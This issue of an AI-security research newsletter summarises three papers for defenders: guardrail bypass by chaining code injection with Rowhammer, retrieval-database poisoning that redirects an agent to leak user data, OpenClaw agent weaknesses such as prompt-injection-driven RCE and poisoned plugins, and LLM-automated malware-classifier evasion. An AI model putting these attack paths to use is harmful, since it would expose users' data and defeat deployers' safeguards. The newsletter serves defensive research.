#1 2026-03-17 M. Hirani TLP:GREEN 3 papers

Research Radar: Issue #1

Radar Rating
TR Threat Realism How real is this attack today?
DU Defensive Urgency How urgently should defenders act?
NO Novelty How new is this attack class?
RM Research Maturity How solid is the evidence?
Each dimension scored 1 (low) to 5 (high)

This Week's Signal

  • Compound AI systems may inherit the full CVE attack surface. The Cascade paper shows that classical software vulnerabilities and hardware fault attacks can compose across model, software, and hardware boundaries in compound AI pipelines (RAP-2026-002).
  • Autonomous agent frameworks need execution-layer security, not just prompt filters. An OpenClaw security analysis identifies four vulnerability classes spanning prompt-injection-driven RCE, sequential tool attack chains, context amnesia, and supply chain contamination, and argues that content filtering alone is insufficient (RAP-2026-003).
  • LLMs automate adversarial attacks against ML classifiers. A dual-LLM agent architecture (LAMLAD) reports up to 97% evasion against Android malware detectors with an average of three query attempts; the paper's adversarial-training defence cuts ASR by more than 30% on average but still leaves Gemini-based pairings effective (RAP-2026-004).

ACT NOW

Cascade: Composing Software-Hardware Attack Gadgets for Adversarial Threat Amplification in Compound AI Systems

Authors: Sarbartha Banerjee, Prateek Sahu, Anjo Vahldiek-Oberwagner, Jose Sanchez Vicarte, Mohit Tiwari ArXiv: 2603.12023v1

Stream: S2: Agent Security | RAXE ID: RAP-2026-002

The paper demonstrates that classical software bugs and hardware fault attacks (Rowhammer bit-flips) can be chained to bypass AI guardrails and exfiltrate data from compound AI systems. It frames these cross-layer weaknesses as attack gadgets that compose across model, software, and hardware boundaries. Organisations deploying compound AI pipelines – particularly RAG stacks and LLM agents – should not assume their AI-specific safety layers compensate for unpatched infrastructure vulnerabilities (RAXE assessment).

The authors present two concrete end-to-end compositions: one combines a software code injection flaw with a Rowhammer-based guardrail bypass to inject an unaltered jailbreak prompt, and another manipulates the knowledge database to redirect an agent into sending sensitive user data to a malicious application. The paper positions these compositions as evidence that defenders need cross-stack red-teaming, not component-by-component hardening.

Defender action: Patch all CVE-tracked components in AI inference infrastructure on the standard enterprise schedule. Treat the retrieval corpus of any RAG or agentic deployment as a high-integrity trust boundary. Evaluate ECC memory for guardrail-hosting infrastructure (RAXE assessment).

Threat Realism Defensive Urgency Novelty Research Maturity
4 4 5 3

Uncovering Security Threats and Architecting Defenses in Autonomous Agents: A Case Study of OpenClaw

Authors: Zonghao Ying, Xiao Yang, Siyang Wu et al. ArXiv: 2603.12644v1

Stream: S2: Agent Security | RAXE ID: RAP-2026-003

The paper presents a comprehensive security analysis of OpenClaw, an autonomous agent framework that exposes OS-level capabilities to LLM-driven workflows. It identifies four recurring vulnerability classes: prompt-injection-driven RCE, sequential tool attack chains, context amnesia, and supply chain contamination.

Rather than presenting a conventional exploit benchmark, the paper maps these risks to observed OpenClaw ecosystem weaknesses – including poisoned Skills/plugins, token-theft-to-RCE paths, and persistent memory pollution – and then proposes the Full-Lifecycle Agent Security Architecture (FASA) as a defense blueprint. Project ClawGuard is described as an ongoing implementation effort rather than a finished defense platform.

Analyst note: Abstract discrepancy detected between initial brief and API-verified source. Quantitative figures (92% ASR, less than 5% residual) could not be verified from the abstract and are excluded.

Defender action: Treat the four vulnerability classes as an immediate audit checklist for any autonomous agent deployment. Content-filtering defences are architecturally insufficient for tool-calling agents (Abstract). Review the ClawGuard repository for released mitigation tooling (RAXE assessment).

Threat Realism Defensive Urgency Novelty Research Maturity
4 4 3 2

WATCH

LLM-Driven Feature-Level Adversarial Attacks on Android Malware Detectors

Authors: Tianwei Lan, Farid Nait-Abdesselam ArXiv: 2512.21404v1

Stream: S1: Adversarial ML | RAXE ID: RAP-2026-004

A dual-LLM agent architecture (LAMLAD) automates feature-level adversarial attacks against ML-based Android malware classifiers, achieving evasion rates of up to 97% with an average of three query attempts while preserving malicious functionality. The paper also evaluates adversarial training as a defense, reporting ASR reductions greater than 30% across all tested detectors; Gemini-based pairings remain the strongest attacks even after hardening (RAXE assessment).

Analyst note: Abstract conflict detected – initial brief cited "FeatureLLM" with 88.6%, API-verified abstract says "LAMLAD" with 97%. Verified version used throughout.

Defender action: Organisations operating ML-based endpoint classifiers should evaluate whether Drebin-style feature representations remain fit for purpose against automated perturbation tools. Monitor query patterns for automated perturbation loops (RAXE assessment).

Threat Realism Defensive Urgency Novelty Research Maturity
4 3 4 3

Stream Coverage

Stream Papers This Week Coverage
S1: Adversarial ML 1 LAMLAD dual-agent adversarial attacks
S2: Agent Security 2 Cascade compound attacks + OpenClaw threat analysis
S3: Supply Chain 0 No papers selected this week
S4: Prompt Injection 0 No verified papers this week; candidates available for Issue #2

Methodology and Transparency

RAXE Research Radar scans arXiv weekly for AI security papers, selects the most relevant for full reading, and produces practitioner-focused summaries. Every paper is verified to exist via the arXiv API before content work begins. For Issue #1, all three selected papers were manually checked against the full paper text before publication, and unsupported claims were removed or rewritten.

Anti-hallucination protocol: RAXE does not publish quantitative or exploit-detail claims from automated extraction alone. When a statement cannot be substantiated against the source text, it is downgraded or removed rather than shipped provisionally. This conservative approach prioritises accuracy over depth.


RAXE Research Radar Issue #1 – Published 2026-03-17 RAXE Labs – Independent AI Threat Intelligence